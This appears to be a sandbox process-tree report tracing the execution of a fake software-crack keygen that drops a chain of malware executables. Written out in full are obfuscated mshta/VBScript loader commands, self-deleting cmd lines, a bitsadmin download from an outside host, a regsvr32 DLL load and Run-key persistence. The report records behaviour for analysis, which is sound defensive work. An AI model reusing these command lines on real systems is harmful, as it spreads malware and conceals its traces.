                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2136 /prefetch:8
                                                                                                                        2⤵
                                                                                                                          PID:6092
                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                                                                        1⤵
                                                                                                                          PID:2540
                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                                                                          1⤵
                                                                                                                            PID:2504
                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                                                            1⤵
                                                                                                                              PID:1964
                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                                              1⤵
                                                                                                                                PID:1376
                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                                                                                1⤵
                                                                                                                                  PID:1352
                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                                                  1⤵
                                                                                                                                    PID:1180
                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                                                    1⤵
                                                                                                                                      PID:1172
                                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                                      1⤵
                                                                                                                                        PID:344
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\jveeutw
                                                                                                                                          C:\Users\Admin\AppData\Roaming\jveeutw
                                                                                                                                          2⤵
                                                                                                                                            PID:6000
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\jueeutw
                                                                                                                                            C:\Users\Admin\AppData\Roaming\jueeutw
                                                                                                                                            2⤵
                                                                                                                                              PID:3892
                                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                            1⤵
                                                                                                                                              PID:996
                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                              1⤵
                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:3752
                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                2⤵
                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                • Checks processor information in registry
                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                • Modifies registry class
                                                                                                                                                PID:4148
                                                                                                                                            • C:\Windows\System32\rundll32.exe
                                                                                                                                              C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                              1⤵
                                                                                                                                                PID:5736
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp2_Trepcad_6_6_00_crack_by_FFF.zip\Trepcad_6_6_00_crack_by_FFF.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Temp2_Trepcad_6_6_00_crack_by_FFF.zip\Trepcad_6_6_00_crack_by_FFF.exe"
                                                                                                                                                1⤵
                                                                                                                                                  PID:6128
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                                                                                                                                                    2⤵
                                                                                                                                                      PID:4420
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                                        keygen-pr.exe -p83fsase3Ge
                                                                                                                                                        3⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:4892
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                                                                                                                                                          4⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:5180
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                                                                                                                                                            5⤵
                                                                                                                                                              PID:5000
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                                                          keygen-step-1.exe
                                                                                                                                                          3⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:4888
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe
                                                                                                                                                          keygen-step-5.exe
                                                                                                                                                          3⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:4116
                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                            "C:\Windows\System32\mshta.exe" VBScRiPt: cLOsE (CREATeOBJECt( "wSCRIpT.shEll" ). RUN ( "cMd /C type ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" > MwwOA5GbuNV~Z.exe && sTArT MwwOA5GbuNV~Z.exe /pkpxuxwmNl2s_EnQNC5XPVi2 & iF """" == """" for %M In ( ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" ) do taskkill /F -iM ""%~NXM"" > nUl " , 0 ) )
                                                                                                                                                            4⤵
                                                                                                                                                              PID:5324
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C type "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" > MwwOA5GbuNV~Z.exe &&sTArT MwwOA5GbuNV~Z.exe /pkpxuxwmNl2s_EnQNC5XPVi2 & iF "" == "" for %M In ( "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" ) do taskkill /F -iM "%~NXM" > nUl
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:5304
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\MwwOA5GbuNV~Z.exe
                                                                                                                                                                    MwwOA5GbuNV~Z.exe /pkpxuxwmNl2s_EnQNC5XPVi2
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:5572
                                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                      "C:\Windows\System32\mshta.exe" VBScRiPt: cLOsE (CREATeOBJECt( "wSCRIpT.shEll" ). RUN ( "cMd /C type ""C:\Users\Admin\AppData\Local\Temp\MwwOA5GbuNV~Z.exe"" > MwwOA5GbuNV~Z.exe && sTArT MwwOA5GbuNV~Z.exe /pkpxuxwmNl2s_EnQNC5XPVi2 & iF ""/pkpxuxwmNl2s_EnQNC5XPVi2 "" == """" for %M In ( ""C:\Users\Admin\AppData\Local\Temp\MwwOA5GbuNV~Z.exe"" ) do taskkill /F -iM ""%~NXM"" > nUl " , 0 ) )
                                                                                                                                                                      7⤵
                                                                                                                                                                        PID:5500
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C type "C:\Users\Admin\AppData\Local\Temp\MwwOA5GbuNV~Z.exe" > MwwOA5GbuNV~Z.exe &&sTArT MwwOA5GbuNV~Z.exe /pkpxuxwmNl2s_EnQNC5XPVi2 & iF "/pkpxuxwmNl2s_EnQNC5XPVi2 " == "" for %M In ( "C:\Users\Admin\AppData\Local\Temp\MwwOA5GbuNV~Z.exe" ) do taskkill /F -iM "%~NXM" > nUl
                                                                                                                                                                          8⤵
                                                                                                                                                                            PID:740
                                                                                                                                                                        • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                          "C:\Windows\System32\regsvr32.exe" /U -S .\5VOMHR.c
                                                                                                                                                                          7⤵
                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                          • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                                                                                          PID:1604
                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                        taskkill /F -iM "keygen-step-5.exe"
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                        PID:5624
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                                                                  keygen-step-2.exe
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                  • Modifies system certificate store
                                                                                                                                                                  PID:4908
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\4487.tmp.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\4487.tmp.exe"
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    PID:1004
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\4487.tmp.exe"
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:5096
                                                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                          timeout /T 10 /NOBREAK
                                                                                                                                                                          6⤵
                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                          PID:4816
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe"
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                      PID:1948
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe"
                                                                                                                                                                        5⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:1660
                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1948 -s 268
                                                                                                                                                                        5⤵
                                                                                                                                                                        • Program crash
                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                        PID:5896
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:1588
                                                                                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                          ping 127.0.0.1
                                                                                                                                                                          5⤵
                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                          PID:5944
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                                                                                                                                                      keygen-step-3.exe
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:4608
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:5448
                                                                                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                            ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                            PID:5660
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                                                                                                                                                        keygen-step-4.exe
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:5044
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\xiuhuali.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\xiuhuali.exe"
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                          PID:3156
                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                            "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                            PID:5296
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\JoSetp.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\JoSetp.exe"
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                          PID:4192
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:2368
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-MK5LL.tmp\Install.tmp
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-MK5LL.tmp\Install.tmp" /SL5="$302B8,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            PID:4984
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-IHA4M.tmp\Ultra.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-IHA4M.tmp\Ultra.exe" /S /UID=burnerch1
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:3728
                                                                                                                                                                                • C:\Program Files\Java\LBRTASYUYM\ultramediaburner.exe
                                                                                                                                                                                  "C:\Program Files\Java\LBRTASYUYM\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                  7⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:3868
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-VD296.tmp\ultramediaburner.tmp
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-VD296.tmp\ultramediaburner.tmp" /SL5="$4028A,281924,62464,C:\Program Files\Java\LBRTASYUYM\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                    8⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                    PID:6120
                                                                                                                                                                                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                      "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                      9⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:4416
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\3e-724b0-238-7a7a3-55774423f958d\Qifepewipi.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\3e-724b0-238-7a7a3-55774423f958d\Qifepewipi.exe"
                                                                                                                                                                                  7⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                  PID:4588
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\15-89735-045-e62b4-6f0b1f949cab9\Vilisocipu.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\15-89735-045-e62b4-6f0b1f949cab9\Vilisocipu.exe"
                                                                                                                                                                                  7⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                  PID:4912
                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uz1ajl5n.1b0\instEU.exe & exit
                                                                                                                                                                                    8⤵
                                                                                                                                                                                      PID:5516
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\uz1ajl5n.1b0\instEU.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\uz1ajl5n.1b0\instEU.exe
                                                                                                                                                                                        9⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:2272
                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3yljplc2.vuy\md1_1eaf.exe & exit
                                                                                                                                                                                      8⤵
                                                                                                                                                                                        PID:2120
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\3yljplc2.vuy\md1_1eaf.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\3yljplc2.vuy\md1_1eaf.exe
                                                                                                                                                                                          9⤵
                                                                                                                                                                                          • Drops file in Drivers directory
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                          PID:3728
                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f3hus35v.ac4\google-game.exe & exit
                                                                                                                                                                                        8⤵
                                                                                                                                                                                          PID:4988
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\f3hus35v.ac4\google-game.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\f3hus35v.ac4\google-game.exe
                                                                                                                                                                                            9⤵
                                                                                                                                                                                              PID:5872
                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                                                                                                                                                                                10⤵
                                                                                                                                                                                                  PID:5368
                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sufscazt.mni\y1.exe & exit
                                                                                                                                                                                              8⤵
                                                                                                                                                                                                PID:4308
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\sufscazt.mni\y1.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\sufscazt.mni\y1.exe
                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                    PID:5620
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\CzYihaFUb2.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\CzYihaFUb2.exe"
                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                        PID:5784
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\1619206157727.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\1619206157727.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619206157727.txt"
                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                            PID:4604
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\CzYihaFUb2.exe"
                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                              PID:7096
                                                                                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                ping 127.0.0.1 -n 3
                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                                PID:4152
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\sufscazt.mni\y1.exe"
                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                              PID:4752
                                                                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                timeout /T 10 /NOBREAK
                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                PID:5432
                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\azsft2un.kc4\inst.exe & exit
                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                            PID:5124
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\azsft2un.kc4\inst.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\azsft2un.kc4\inst.exe
                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                PID:4740
                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f2zfvtzx.bjd\SunLabsPlayer.exe /S & exit
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                PID:4608
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\f2zfvtzx.bjd\SunLabsPlayer.exe
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\f2zfvtzx.bjd\SunLabsPlayer.exe /S
                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                    PID:4712
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszB295.tmp\tempfile.ps1"
                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                        PID:6764
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszB295.tmp\tempfile.ps1"
                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                          PID:860
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszB295.tmp\tempfile.ps1"
                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                            PID:4544
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszB295.tmp\tempfile.ps1"
                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                              PID:7000
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszB295.tmp\tempfile.ps1"
                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                PID:5176
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszB295.tmp\tempfile.ps1"
                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                  PID:6956
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszB295.tmp\tempfile.ps1"
                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                    PID:5404
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                    "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                    • Download via BitsAdmin
                                                                                                                                                                                                                                    PID:6528
                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g2fcha1k.sck\GcleanerWW.exe /mixone & exit
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                  PID:5788
                                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                      PID:5096
                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uydaocnr.uua\toolspab1.exe & exit
                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                      PID:5092
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\uydaocnr.uua\toolspab1.exe
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\uydaocnr.uua\toolspab1.exe
                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                          PID:6452
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\uydaocnr.uua\toolspab1.exe
                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\uydaocnr.uua\toolspab1.exe
                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                              PID:6536
                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xrewwhqa.bb5\c7ae36fa.exe & exit
                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                            PID:860
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\xrewwhqa.bb5\c7ae36fa.exe
                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\xrewwhqa.bb5\c7ae36fa.exe
                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                PID:6596
                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\shmf5qlz.5ts\app.exe /8-2222 & exit
                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                PID:6292
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\shmf5qlz.5ts\app.exe
                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\shmf5qlz.5ts\app.exe /8-2222
                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                    PID:6756
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\shmf5qlz.5ts\app.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\shmf5qlz.5ts\app.exe" /8-2222
                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                        PID:6412
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\filee.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\filee.exe"
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                            PID:4692
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\7F6D.tmp.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\7F6D.tmp.exe"
                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                              PID:5356
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\7F6D.tmp.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\7F6D.tmp.exe"
                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                PID:992
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\827B.tmp.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\827B.tmp.exe"
                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                              • Adds Run key to start application
